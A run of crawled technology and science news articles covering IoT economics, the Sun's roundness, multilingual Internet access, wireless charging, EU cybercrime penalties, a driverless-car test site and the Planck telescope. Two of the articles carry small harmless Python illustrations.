The study estimates that the annual value of IoT applications may be equivalent -- in the best case -- to about 11% of the world's economy in 2025. That's based on a number of assumptions, including the willingness of governments and vendors to enable interoperability through policies and technologies. IoT is expected to deliver improvements to the reliability of machines, as well as to individual health and life overall. But it may also intrude on privacy, and while the IoT will create new jobs, it will cost some as well. Here are five major points from this report:
- Business IoT applications, not consumer uses, will create more business value, according to McKinsey. No surprise here. Consumer applications such as connected toasters, coffee pots and home entertainment systems offer little in terms of real value -- but they do get attention. Enterprise IoT is being used to predict and avoid failures in high-value machinery, such as locomotives and magnetic resonance imaging (MRI) devices. It also allows businesses to switch from scheduled maintenance programs to condition-based maintenance, where service is performed as needed, not based on a calendar (a minimal illustration of this trigger logic follows the article). This increases equipment reliability and efficient deployment of personnel.
- A major share of the IoT's financial gains comes through avoided cost. For instance, doctors can use IoT to monitor a patient's health. If the person is a diabetic, careful monitoring may prevent hospitalizations. This includes the use not only of wearables but of devices that can be implanted, injected and ingested.
- Virtual reality is part of IoT. Virtual reality goggles will observe and guide you step-by-step through an installation process at home and work. This capability will likely arrive first on factory floors and in equipment repair shops, but eventually it'll be available at home.
- McKinsey estimates IoT's potential economic impact at between $3.9 trillion and $11.1 trillion globally per year by 2025. But interoperability accounts for about 40% of this potential value. Equipment makers now collect performance data from their own machines, but interoperability with other systems will give an integrated view and improve predictive analysis in environments that use multiple systems. In a municipal setting, for instance, interoperability means that video, cell phone data and vehicle sensors could be used to monitor and optimize traffic flow.
- The efficiency gains delivered by IoT will deliver a mixed bag of benefits for human workers. Better equipment monitoring and ubiquitous deployment of sensors may reduce injuries. It could also help eliminate some travel for employees who have to go to remote sites. But McKinsey warns, "some IoT applications in worksite environments substantially reduce the number of employees needed."
This story, "5 facets of the coming Internet of Things boom" was originally published by Computerworld.
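As referenced above, here is a toy contrast between a calendar-based and a condition-based maintenance trigger. The threshold, interval, and readings are made-up values purely for illustration.

    # Toy contrast between calendar-based and condition-based maintenance triggers.
    # The sensor threshold and readings are made-up values for illustration.
    from datetime import date, timedelta

    VIBRATION_LIMIT_MM_S = 7.1        # assumed alarm threshold for a bearing

    def calendar_due(last_service, interval_days=90):
        """Scheduled maintenance: service whenever the interval has elapsed."""
        return date.today() >= last_service + timedelta(days=interval_days)

    def condition_due(latest_readings):
        """Condition-based maintenance: service when the recent trend crosses a limit."""
        recent = latest_readings[-3:]                  # look at the last few samples
        return all(r > VIBRATION_LIMIT_MM_S for r in recent)

    readings = [3.2, 3.4, 3.3, 6.8, 7.4, 7.9, 8.3]     # mm/s vibration velocity
    print("calendar says service due:", calendar_due(date(2025, 1, 1)))
    print("condition says service due:", condition_due(readings))

The calendar rule dispatches a technician whether or not anything is wrong, while the condition rule only fires when the sensor data says the machine actually needs attention.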
If you thought the Sun was round -- you'd be right. But astronomers this week said the Sun is so round it's nearly perfect in its roundness. So round that astronomers said if they scaled it to the size of a beach ball, the difference between its widest and narrowest diameters would be much less than the width of a human hair. It's not that scientists didn't know the Sun was round, mind you; they just didn't know how round. Using an instrument on NASA's Solar Dynamics Observatory satellite, astronomers said they were able to "measure the solar shape with unprecedented accuracy." The study, done by Jeff Kuhn and Isabelle Scholl of the Institute for Astronomy, University of Hawaii at Manoa; Rock Bush of Stanford University; and Marcelo Emilio of Universidade Estadual de Ponta Grossa, Brazil, says that the sun rotates every 28 days, and because it doesn't have a solid surface, it should be slightly flattened. It is this tiny flattening that has been studied with many instruments for almost 50 years to learn about the sun's rotation, especially the rotation below its surface, which we can't see directly, Kuhn said. He added that this solar flattening is remarkably constant over time and too small to agree with that predicted from its surface rotation. This suggests that other subsurface forces, like solar magnetism or turbulence, may be a more powerful influence than expected. "For years we've believed our fluctuating measurements were telling us that the sun varies, but these new results say something different. While just about everything else in the sun changes along with its 11-year sunspot cycle, the shape doesn't," Kuhn said.
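The beach-ball comparison can be checked with simple scaling arithmetic. The solar figures below are rounded assumptions (a mean diameter of roughly 1.39 million km and an equator-to-pole diameter difference on the order of 10 km), used only to illustrate the claim rather than to restate the study's measured values.

    # Scale the Sun's slight flattening down to a beach ball; all inputs are
    # rounded, assumed figures for illustration only.
    SUN_DIAMETER_KM = 1.39e6          # mean solar diameter (approximate)
    DIAMETER_DIFF_KM = 10.0           # assumed equator-vs-pole diameter difference
    BEACH_BALL_DIAMETER_M = 0.5       # a typical beach ball
    HUMAN_HAIR_M = 70e-6              # ~70 micrometres, a commonly quoted width

    scale = BEACH_BALL_DIAMETER_M / (SUN_DIAMETER_KM * 1000.0)
    scaled_diff_m = DIAMETER_DIFF_KM * 1000.0 * scale

    print(f"oblateness: {DIAMETER_DIFF_KM / SUN_DIAMETER_KM:.1e}")
    print(f"scaled difference: {scaled_diff_m * 1e6:.1f} micrometres")
    print(f"fraction of a hair's width: {scaled_diff_m / HUMAN_HAIR_M:.2f}")

With those inputs the scaled difference comes out to a few micrometres, a small fraction of a typical hair's width, which is the point the astronomers were making.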
<urn:uuid:fc45adf3-46b2-410c-a457-16060870d2f1>
CC-MAIN-2017-09
http://www.networkworld.com/article/2222977/security/scientists-find-that-the-sun-is-so-round--it-s-scary.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00366-ip-10-171-10-108.ec2.internal.warc.gz
en
0.97221
366
3.96875
4
The Internet must support the large number of languages in the world at all levels, including content, hardware, software, and internationalized domain names if it is to reach the next billion people, according to speakers at an Internet Governance Forum (IGF) in Hyderabad, India. "When we talk about Internet for all, we have to go beyond the people who speak English," said Manal Ismail, vice chair of the Governmental Advisory Committee (GAC) of the Internet Corporation for Assigned Names and Numbers (ICANN), on Wednesday. Read full story: Network World
<urn:uuid:8897d88d-9e07-458b-b4e9-34c39d4e93c0>
CC-MAIN-2017-09
http://www.circleid.com/posts/igf_next_billion_internet_multilingual_support/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170864.16/warc/CC-MAIN-20170219104610-00066-ip-10-171-10-108.ec2.internal.warc.gz
en
0.707777
186
2.53125
3
GCN LAB IMPRESSIONS
Wireless power charging: Tesla's 19th-century idea finally catching on
- By Greg Crowe - Jun 27, 2012

Everyone knows what a pain it is to have to plug in electronic devices for recharging. Or, more accurately, to remember to plug said devices in, and then try to remember where the blasted charger is. And the problem can be compounded when you own multiple wireless devices, as a lot of people today do. And then there's the disposal problem seemingly every time you get a new device. The landfill space that was supposed to be saved by fewer batteries being thrown away has ended up being filled by old power adapters instead.

Fortunately for us, wireless recharging has come along, in the form of those fancy pads that can charge phones sitting nearby, and they are making some headway in the electronic device market. Right now they work, but their range is limited. Image courtesy of PowerbyProxi.

Wireless recharging is an idea we'd love to see catch on. But how revolutionary is it? Actually, Nikola Tesla published patents for wireless power transmission in the 1890s, and even dreamed of intercontinental wireless transmission of industrial power. But like many radical ideas, a lot of Tesla's weren't implemented until much, much later. It wasn't until early in this century that work began on the magnetic induction pads that enable you to recharge a compatible device just by laying it on the pad. And only a few years ago, in 2009, the Wireless Power Consortium was founded and began developing standards for wireless power transmission.

Now, more and more new devices are equipped to handle wireless recharging. You can even retrofit your old smart phone to recharge that way. Public recharging stations are becoming even more prevalent in some forward-thinking cities. Soon, recharging cords will be a thing of the past, and we will send the last of them to the landfill. This just goes to show that, when a revolutionary scientist like Tesla says something, we should listen, even 120 years later.

Often, the one thing that keeps most ideas like this from being implemented immediately is a material or component that is either not common enough or too costly or difficult to manufacture. Later, when we get to the point where that is no longer a problem, we tend to forget about older patents that could take advantage of the new development. I don't know whether there is a solution here, since there are a lot of patents that would need to be revisited every few years or so. But hopefully other good ideas won't take more than 100 years to see fruition.

Greg Crowe is a former GCN staff writer who covered mobile technology.
<urn:uuid:4c51d9ec-f165-4d42-a88d-962df6942b18>
CC-MAIN-2017-09
https://gcn.com/articles/2012/06/27/wireless-power-adapters-tesla-idea-catches-on.aspx?admgarea=TC_Mobile
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00242-ip-10-171-10-108.ec2.internal.warc.gz
en
0.958081
577
2.875
3
Cyber criminals could face tougher penalties across the European Union under new rules adopted by the European Parliament, which include the creation of a specific offence of using botnets. The draft directive adopted by the parliament on Thursday defines specific criminal offences for cybercrime and sets specific sanctions for each. It also requires E.U. countries to assist fellow member states and respond to urgent requests for help within eight hours in the event of a cyber attack. The text has already been informally agreed with member states, and that agreement is expected to be formalized shortly. The member states will then have two years to implement it in national law.

Under the draft law, using botnets to establish remote control over a significant number of computers by infecting them with malicious software carries a penalty of at least three years' imprisonment. Meanwhile, criminals responsible for cyber attacks against "critical infrastructure", such as power plants, transport networks and government networks, would face at least five years in jail. The same would apply if an attack is committed by a criminal organisation or if it causes serious damage. "Attacks against information systems pose a growing challenge to businesses, governments and citizens alike. Such attacks can cause serious damage and undermine users' confidence in the safety and reliability of the Internet," said Home Affairs Commissioner Cecilia Malmström, welcoming the news.

Companies or organizations would also be liable for offences committed for their benefit, for example hiring a hacker to get access to a competitor's database. The directive, which updates rules that have been in place since 2005, also requires member states to allow judges the possibility to sentence criminals to two years in jail for the crimes of illegally accessing or interfering with information systems, illegally interfering with data, illegally intercepting communications or intentionally producing and selling tools used to commit these offences. Minor cases are excluded, but it is up to each country to determine what constitutes a "minor" case. However, technology blogger Glyn Moody expressed concern about possible mission-creep. "I predict laws will be abused by E.U. governments to attack coders and geeks," he said on Twitter. The directive will apply across all E.U. member states with the exception of Denmark, which decided to opt out.
<urn:uuid:b47f14b9-ab11-4f0a-b5a1-29b104e76db6>
CC-MAIN-2017-09
http://www.cio.com/article/2384366/legal/eu-parliament-approves-stricter-penalties-for-cyber-attacks.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172017.60/warc/CC-MAIN-20170219104612-00118-ip-10-171-10-108.ec2.internal.warc.gz
en
0.959324
457
2.578125
3
The University of Michigan is building a 32-acre simulated city center complete with building facades, stoplights, intersections, traffic circles, and even construction sites to test driverless cars. The simulated city, scheduled to be open this fall, will let researchers test how automated and networked vehicles respond to various and dangerous traffic situations and road conditions. Having a spot where researchers can evaluate the safety of autonomous systems is a critical step in getting self-driving cars on the road. "The type of testing we're talking about doing, it's not possible to do today in the university infrastructure," said Ryan Eustice, associate professor of naval architecture and marine engineering, in a statement. "Every time a vehicle comes around the loop, it can hit something unusual. That will give us a leg up on getting these vehicles mature and robust and safe." There's an increasing amount of attention being paid to creating fully autonomous cars. Sure, the auto industry has cars on the market that can parallel park themselves and alert the driver if they're about to back up into something. However, Google, for instance, is working on creating fully driverless cars. The company has been road testing these cars for several years, having them drive on highways and, more recently, on city streets. The University of Michigan's new test facility is set up to model the kind of networked and automated automobiles that university researchers expect to find in Ann Arbor by 2021. A networked vehicle communicates with other vehicles in the area, sharing information about traffic speeds, jams and detours. Both networked and autonomous cars should dramatically reduce crashes, ease traffic and reduce pollution. There's no word yet on whether Google will be one of the companies using the test facility. However, the university announced that Ford will be testing its Fusion hybrid there. University scientists are working with Ford engineers to develop sensors and mapping technology for the vehicle. The facility is being built to include merge lanes, road signs, railroad crossings and even mechanical pedestrians.
<urn:uuid:cfa0fff1-f400-4613-b9dc-c6126a63ece1>
CC-MAIN-2017-09
http://www.itworld.com/article/2695369/hardware/university-building-simulated-city-to-test-driverless-cars.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172017.60/warc/CC-MAIN-20170219104612-00118-ip-10-171-10-108.ec2.internal.warc.gz
en
0.950638
510
3.125
3
Many of the caching systems on the market tend to focus on a particular platform. Some, for example, only accelerate VMware environments, others a specific operating system. The key is to find one that will fix your particular I/O problem. For example, if your problem area is VMware, then look for caching systems that specifically support VMware. If you have a Microsoft SQL performance problem, then you may be better served by a file-aware or even SQL-aware system.

In addition to supporting the specific platform you need to accelerate, the other consideration is the storage protocol that the platform uses. Caching is a relatively low-level I/O activity, so these systems need to understand what is happening at a protocol level. As a result, you will see that each of the caching systems will often support a specific protocol. For example, if you are hosting your VMware images on NFS, then look for a caching system that supports NFS.

In-Server or In-Network

An area of confusion with server caching systems is where the caching should occur. Some systems leverage memory-based storage in the server, and others are network-based. The network-based systems were originally caching appliances installed between the servers and the storage, acting as shock absorbers for read traffic. Increasingly, though, we are seeing systems that network the flash storage already installed in the servers, essentially aggregating it into a common pool of storage.

The obvious differentiator between the implementation types (server vs. network) is that in-server systems are less dependent on the speed and quality of a network in order to maintain performance. But the capacity of memory storage in in-server systems may not be used as efficiently, since that capacity is captive to a single host. Also, in-server systems can have performance issues in VMware environments when a VM is migrated. Network systems may introduce latency, but they are more resilient to flash or server failure and typically have fewer issues when VMs are migrated to other servers.

Block vs. File

A final consideration is whether the cache is going to be file-based or block-based. Block-based systems work independently of the files being accessed and move the most active blocks of data into the cache. This capability makes implementation easier in a virtualized environment because the cache can work across VMs. File-based systems are more aware of the data, and allow specific files to be monitored and accelerated, in some cases even pinned to the cache storage area. Using a file-based cache may mean either installing the caching software inside the guest OS or leveraging a separate NFS share, but such systems may be more efficient since they can focus only on the files that need accelerating. As a result, they may require a smaller investment in SSD capacity and therefore be less expensive. Some manual interaction is typically required to get this efficiency, so there has to be available IT staff to fine-tune them.

Off-storage system caching is a crowded market, and we encounter another new vendor at least once a week. There are plenty of good off-storage caching systems but no perfect solutions. The key for product selection is to look for a system that covers your specific performance need. Until the market matures, you may also find it better to use two or three systems in your data center based on what needs acceleration.
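To make the block-based approach described above concrete, here is a minimal, illustrative sketch of a read cache that keeps the hottest fixed-size blocks in a limited "flash" tier regardless of which file or VM they belong to. It is a toy model only; real caching products add write handling, persistence, protocol awareness, and far more sophisticated eviction policies.

```python
from collections import OrderedDict

class BlockReadCache:
    """Toy block-level read cache: holds the most recently used blocks in a
    fixed-size tier and evicts the least recently used block when full."""

    def __init__(self, capacity_blocks, backing_read):
        self.capacity = capacity_blocks
        self.backing_read = backing_read      # callable: block_id -> bytes
        self.cache = OrderedDict()            # block_id -> data
        self.hits = self.misses = 0

    def read(self, block_id):
        if block_id in self.cache:
            self.hits += 1
            self.cache.move_to_end(block_id)  # mark as most recently used
            return self.cache[block_id]
        self.misses += 1
        data = self.backing_read(block_id)    # slow path: go to the array
        self.cache[block_id] = data
        if len(self.cache) > self.capacity:
            self.cache.popitem(last=False)    # evict the coldest block
        return data

# Example: a 1,000-block cache in front of a simulated slow backing store.
cache = BlockReadCache(1000, backing_read=lambda b: b"\x00" * 4096)
for block in [1, 2, 3, 1, 1, 2]:
    cache.read(block)
print(cache.hits, cache.misses)   # 3 hits, 3 misses
```

A file-aware cache would sit above this layer, deciding which files' blocks are allowed into (or pinned in) the tier rather than treating all blocks equally.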
<urn:uuid:f992ee70-2ec1-45c8-bcf3-d2f0acde52e5>
CC-MAIN-2017-09
http://www.networkcomputing.com/storage/how-pick-right-storage-caching-system/930915484?cid=sbx_bigdata_related_mostpopular_data_protection_big_data&itc=sbx_bigdata_related_mostpopular_data_protection_big_data&piddl_msgorder=
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00062-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945628
689
2.546875
3
The lineup of depressing security stats in a recent report by the Government Accountability Office on mobile devices is growing.

- According to Juniper Networks, the number of variants of malicious software, or malware, aimed at mobile devices has reportedly risen from about 14,000 to 40,000, a roughly 185% increase in less than a year.
- New mobile vulnerabilities have been increasing, from 163 in 2010 to 315 in 2011, an increase of over 93%.
- An estimated half million to one million people had malware on their Android devices in the first half of 2011.
- Three out of 10 Android owners are likely to encounter a threat on their device each year as of 2011.

"Threats to the security of mobile devices and the information they store and process have been increasing significantly. Cyber criminals may use a variety of attack methods, including intercepting data as they are transmitted to and from mobile devices and inserting malicious code into software applications to gain access to users' sensitive information. These threats and attacks are facilitated by vulnerabilities in the design and configuration of mobile devices, as well as the ways consumers use them. Common vulnerabilities include a failure to enable password protection and operating systems that are not kept up to date with the latest security patches," the GAO stated.

The GAO said federal agencies and private companies have promoted secure technologies and practices through standards and public-private partnerships, but that despite these efforts, safeguards have not been consistently implemented. The GAO report went on to define some of the attacks facing mobile device users. Some are old hat and have been a problem for computer users for years, but some are unique to the mobile world. Take a look, from the GAO report:

- Browser exploits: These exploits are designed to take advantage of vulnerabilities in software used to access websites. Visiting certain web pages and/or clicking on certain hyperlinks can trigger browser exploits that install malware or perform other adverse actions on a mobile device.
- Data interception: Data interception can occur when an attacker is eavesdropping on communications originating from or being sent to a mobile device. Electronic eavesdropping is possible through various techniques, such as (1) man-in-the-middle attacks, which occur when a mobile device connects to an unsecured WiFi network and an attacker intercepts and alters the communication; and (2) WiFi sniffing, which occurs when data are sent to or from a device over an unsecured (i.e., not encrypted) network connection, allowing an eavesdropper to "listen to" and record the information that is exchanged.
- Keystroke logging: This is a type of malware that records keystrokes on mobile devices in order to capture sensitive information, such as credit card numbers. Generally keystroke loggers transmit the information they capture to a cyber criminal's website or e-mail address.
- Malware: Malware is often disguised as a game, patch, utility, or other useful third-party software application.
Malware can include spyware (software that is secretly installed to gather information on individuals or organizations without their knowledge), viruses (a program that can copy itself and infect the mobile system without permission or knowledge of the user), and Trojans (a type of malware that disguises itself as or hides itself within a legitimate file). Once installed, malware can initiate a wide range of attacks and spread itself onto other devices. The malicious application can perform a variety of functions, including accessing location information and other sensitive information, gaining read/write access to the user's browsing history, as well as initiating telephone calls, activating the device's microphone or camera to surreptitiously record information, and downloading other malicious applications. Repackaging, the process of modifying a legitimate application to insert malicious code, is one technique that an attacker can use.
- Unauthorized location tracking: Location tracking allows the whereabouts of registered mobile devices to be known and monitored. While it can be done openly for legitimate purposes, it may also take place surreptitiously. Location data may be obtained through legitimate software applications as well as malware loaded on the user's mobile device.
- Network exploits: Network exploits take advantage of software flaws in the system that operates on local (e.g., Bluetooth, WiFi) or cellular networks. Network exploits often can succeed without any user interaction, making them especially dangerous when used to automatically propagate malware. With special tools, attackers can find users on a WiFi network, hijack the users' credentials, and use those credentials to impersonate a user online. Another possible attack, known as bluesnarfing, enables attackers to gain access to contact data by exploiting a software flaw in a Bluetooth-enabled device.
- Phishing: Phishing is a scam that frequently uses e-mail or pop-up messages to deceive people into disclosing sensitive information. Internet scammers use e-mail bait to "phish" for passwords and financial information from mobile users and other Internet users.
- Spamming: Spam is unsolicited commercial e-mail advertising for products, services, and websites. Spam can also be used as a delivery mechanism for malicious software. Spam can appear in text messages as well as electronic mail. Besides the inconvenience of deleting spam, users may face charges for unwanted text messages. Spam can also be used for phishing attempts.
- Spoofing: Attackers may create fraudulent websites to mimic or "spoof" legitimate sites and in some cases may use the fraudulent sites to distribute malware to mobile devices. E-mail spoofing occurs when the sender address and other parts of an e-mail header are altered to appear as though the e-mail originated from a different source. Spoofing hides the origin of an e-mail message. Spoofed e-mails may contain malware.
- Theft/loss: Because of their small size and use outside the office, mobile devices can be easier to misplace or steal than a laptop or notebook computer. If mobile devices are lost or stolen, it may be relatively easy to gain access to the information they store.
- Zero-day exploit: A zero-day exploit takes advantage of a security vulnerability before an update for the vulnerability is available.
By writing an exploit for an unknown vulnerability, the attacker creates a potential threat because mobile devices generally will not have software patches to prevent the exploit from succeeding.

Attacks against mobile devices generally occur through four different channels of activity:

- Software downloads. Malicious applications may be disguised as a game, device patch, or utility that is available for download by unsuspecting users, providing the means for attackers to gain unauthorized use of mobile devices and access to private information or system resources on those devices.
- Visiting a malicious website. Malicious websites may automatically download malware to a mobile device when a user visits. In some cases, the user must take action (such as clicking on a hyperlink) to download the application, while in other cases the application may download automatically.
- Direct attack through the communication network. Rather than targeting the mobile device itself, some attacks try to intercept communications to and from the device in order to gain unauthorized use of mobile devices and access to sensitive information.
- Physical attacks. Unauthorized individuals may gain possession of lost or stolen devices, gaining unauthorized use of the device and access to sensitive information stored on it.
<urn:uuid:883f2fed-e5de-4d32-a84c-b0513ada04be>
CC-MAIN-2017-09
http://www.networkworld.com/article/2223158/malware-cybercrime/cybercrime-fest-targets-mobile-devices.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170613.8/warc/CC-MAIN-20170219104610-00238-ip-10-171-10-108.ec2.internal.warc.gz
en
0.925893
1,554
2.78125
3
University researchers have built a program that mimics the way people play the memory game Concentration, opening the possibility of improving computer security by distinguishing human behavior from bots. The study, conducted by North Carolina State University researchers, sets the groundwork for one day being able to integrate within software highly accurate bot-detection programs to prevent computer fraud. Bots are software applications that run automated tasks over the Internet. While having legitimate purposes, such as fetching information from websites for search queries, bots are also used by scalpers to buy large quantities of tickets from ticketing sites and to infiltrate online in-game economies to amass virtual currency.

The NCSU researchers set out to see whether they could simulate people's thought processes in playing Concentration, a solitaire game in which cards are arranged facedown on a grid and a person tries to find matching pairs. To do that, a person turns over a card and then chooses another. If they choose right, the pair is taken off the grid. If not, then the cards are turned facedown and the player tries again, hoping to remember the location of cards in order to find them again later to make a match. "Concentration has been used in psychology literature as a model for memory for a few decades now," Robert St. Amant, co-author of the report, entitled "Modeling the Concentration Game with ACT-R," said on Monday. "But no one to our knowledge has built a cognitively plausible account of how people play the game."

The researchers gathered information on the thought processes involved by monitoring the gameplay of 179 people playing an online version of Concentration that involved 16 cards. The game was played under two conditions, accuracy and speed. Under the latter, participants scored higher the faster they finished the game. Under the former, they got more points for choosing the right match. When striving for accuracy, the players were less random in their choices and had more time to think about the location of cards. The data fed into the program developed by researchers, called ACT-R, included the probability of the average player forgetting a card's location or remembering one seen before. Overall, ACT-R finished the speed game within a second of the average player and the accuracy game within one mistake. "We thought [the results] were pretty good," St. Amant said. "For us, we were able to distinguish between [people playing] the speed condition and the accuracy condition pretty easily."

The research may eventually lead to determining whether a real person is participating in such activities as online voting because it shows that scientists can simulate human behavior in a program, albeit through a simple game. Further research will be needed to develop programs that can detect humans based on the way the keyboard and mouse are being used. This would replace the use of logs and IP addresses in watching for bots. While it would be possible for criminals to simulate keyboard and mouse use by a person, the expense of doing so would make such bots impractical, St. Amant said. Beyond just discovering bots, St. Amant said he believes future research on keystroke and mouse dynamics could help scientists identify malice. How a person is using the devices "can actually tell something about the probability that you're trying to be a little bit deceptive," he said.
The ability to analyze security-related intent based on how people use the devices that interact with their computers will likely be programmed into software within the next five years, St. Amant said. "Systems already exist to track people's mouse movements and keyboard actions in some kinds of games," St. Amant said. "This is just a matter of building the monitoring tools and raising flags to a human security person."
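To illustrate the kind of modeling involved, the sketch below simulates Concentration play with a single forgetting probability. It is not the ACT-R model used in the study; it is only a hedged toy showing how a forgetful, human-like player and a perfect-recall bot produce measurably different gameplay.

```python
import random

def play_concentration(pairs=8, forget_prob=0.3):
    """Toy memory model for Concentration. Every remembered card location is
    forgotten with probability `forget_prob` each turn; forget_prob=0 plays
    like a bot with perfect recall, larger values play more like a human."""
    deck = list(range(pairs)) * 2
    random.shuffle(deck)
    unmatched = set(range(len(deck)))       # positions still face down
    memory = {}                             # position -> remembered value
    turns = 0

    while unmatched:
        turns += 1
        # Memory decay: forget each remembered location independently.
        memory = {p: v for p, v in memory.items() if random.random() >= forget_prob}

        # Flip a first card, preferring one we do not already remember.
        unknown = list(unmatched - memory.keys())
        first = random.choice(unknown or list(unmatched))
        memory[first] = deck[first]

        # If we remember where its partner is, flip that; otherwise guess.
        partners = [p for p, v in memory.items()
                    if v == deck[first] and p != first]
        second = partners[0] if partners else random.choice(list(unmatched - {first}))
        memory[second] = deck[second]

        if deck[first] == deck[second]:
            unmatched -= {first, second}
            memory.pop(first, None)
            memory.pop(second, None)

    return turns

print("perfect recall :", play_concentration(forget_prob=0.0), "turns")
print("forgetful play :", play_concentration(forget_prob=0.4), "turns")
```

Averaged over many games, the gap in turns (or completion time) between the two settings is the sort of behavioral signal a bot detector could look for.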
<urn:uuid:1dc55fd1-b7cd-4e5c-a4d4-96694e61ef6f>
CC-MAIN-2017-09
http://www.cio.com/article/2384418/cybercrime/researchers-mimic-board-game-to-bolster-computer-security.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171775.73/warc/CC-MAIN-20170219104611-00290-ip-10-171-10-108.ec2.internal.warc.gz
en
0.967926
807
3.421875
3
SDN and Cloud Computing

After a review of Software-Defined Networking (SDN) and its close cousin Network Functions Virtualization (NFV), this white paper addresses three main deployment scenarios: SDN without deploying cloud computing, cloud computing without deploying SDN, and deploying cloud computing in conjunction with SDN. We'll look at use cases, when the approach makes sense, and any applicable limitations.

In this white paper, we'll review Software-Defined Networking (SDN) and briefly touch on its close cousin Network Functions Virtualization (NFV). After highlighting a few relevant cloud computing concepts and terms, we'll look at the three main deployment scenarios: SDN without deploying cloud computing, cloud computing without deploying SDN, and deploying cloud computing in conjunction with SDN. For each of these three scenarios, we'll look at use cases, when the approach makes sense, and any applicable limitations. Finally, we'll conclude with the reason SDN and cloud computing are often mentioned together and determine which approach is best for solving various business challenges.

Brief Review of SDN and Cloud Computing Terms

This white paper is not an in-depth review of SDN, NFV, or cloud computing, but rather explores the relationship between them. Therefore, we will not explain them in detail but instead offer a brief review of terminology and concepts to help you understand the entire white paper. SDN changes how networking is fundamentally done. Instead of having network intelligence distributed across every device, SDN aims to centralize command and control in a master device (or a few of them for redundancy) and to split networking into three planes, namely:

- Management: This is the interface you use to orchestrate the entire network, specifying the way you wish the network to be run at a high level.
- Control: This is where all the individual devices are directed from, using the inputs from the management layer and translating management directives into the actual commands the data layer uses to move traffic around.
- Data: This is where the data is actually moved from one device to another.

A major advantage of SDN is that the actual data layer devices can be much simpler and thus less expensive, as they don't have to decide what to do with each packet they receive. From a human perspective, each device does not need to be individually programmed. SDN's purpose can thus be summarized as centralized command and control.

NFV takes the physical networking devices commonly used today (switches, routers, load balancers, firewalls, antivirus, etc.) and virtualizes them in much the same manner as servers. NFV is used to scale out across devices less expensively (scaling by simply adding compute power) and to automatically deploy devices as needed. Thus each project does not require separate equipment or reprogramming of existing equipment. Relevant devices can be centrally deployed via your hypervisor management platform and configured with rules and policies. NFV is almost exclusively used in conjunction with virtualization of servers. NFV's goal can thus be summarized as automated provisioning of devices.

SDN and NFV Together

While SDN can be used without NFV and vice versa, the real power, especially as it relates to cloud computing, comes when they are used together. When combined, you get automated provisioning along with centralized command and control. In the context of this white paper we will combine both under the SDN banner to simplify the discussion.
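To ground the three-plane split, here is a small, purely illustrative sketch of centralized command and control. The class and method names are invented for this example; they do not correspond to OpenFlow or to any specific controller product.

```python
class Switch:
    """Data plane: forwards traffic using only the rules pushed to it."""
    def __init__(self, name):
        self.name = name
        self.flow_table = {}                 # destination prefix -> out port

    def install_rule(self, dst_prefix, out_port):
        self.flow_table[dst_prefix] = out_port

    def forward(self, dst_ip):
        for prefix, port in self.flow_table.items():
            if dst_ip.startswith(prefix):
                return port
        return None                          # no rule: punt to the controller

class Controller:
    """Control plane: turns high-level intent into per-switch rules."""
    def __init__(self, switches):
        self.switches = {s.name: s for s in switches}

    def apply_policy(self, policy):
        # The management plane hands down intent such as
        # {"10.0.1.": {"s1": 2, "s2": 7}}  (prefix -> {switch: out port}).
        for prefix, hops in policy.items():
            for switch_name, port in hops.items():
                self.switches[switch_name].install_rule(prefix, port)

s1, s2 = Switch("s1"), Switch("s2")
controller = Controller([s1, s2])
controller.apply_policy({"10.0.1.": {"s1": 2, "s2": 7}})
print(s1.forward("10.0.1.25"))   # 2
print(s2.forward("10.0.9.1"))    # None -> would be sent to the controller
```

The point of the sketch is simply that the switches hold no routing intelligence of their own: all decisions flow down from one place, which is what makes the data-plane devices simpler and cheaper.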
Cloud computing is aimed at self-service provisioning across tenants. A tenant may be a project, department, division, or even a different company. As such, security becomes very important. There are multiple models associated with cloud computing; major categories include:

- Infrastructure as a Service (IaaS): Making VMs available to customers with the physical hardware (servers, storage, and networking) managed by the service provider. A variation of IaaS allows physical servers to be used in place of VMs (called MaaS or Metal as a Service by some, though not officially part of the NIST definition of cloud computing).
- Platform as a Service (PaaS): The development platform for programmers is provided as a service while all the details about the physical and virtual equipment are abstracted from the developer and managed by the service provider.
- Software as a Service (SaaS): An application (such as email or contact management) is made available to customers while all the details of the underlying platform are abstracted from the customer.

There are other models and services that can be deployed in conjunction with cloud computing, but they are derivatives of those already listed. This white paper will mostly be addressing the first model (IaaS).
<urn:uuid:136ddfa5-314f-4d61-a407-0a0dc401ff48>
CC-MAIN-2017-09
https://www.globalknowledge.com/ca-en/resources/resource-library/white-paper/sdn-and-cloud-computing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171775.73/warc/CC-MAIN-20170219104611-00290-ip-10-171-10-108.ec2.internal.warc.gz
en
0.920374
961
2.53125
3
The European Space Agency's massive Planck telescope has been hard at work digging through ancient light signals to find the original spark of the Big Bang. The clue-yielding light has traveled 13.8 billion years to reach research equipment and is so faint that Planck has to scan every point on the sky an average of 1,000 times to spot illuminations. This has resulted in an incredibly massive map of the cosmos, not to mention some interesting new spin-outs of the original research mission. As one might imagine, this sky-mapping and light-combing process requires some serious HPC resources. "So far, Planck has made about a trillion observations of a billion points on the sky," said Julian Borrill of the Lawrence Berkeley National Laboratory, Berkeley, Calif. "Understanding this sheer volume of data requires a state-of-the-art supercomputer."

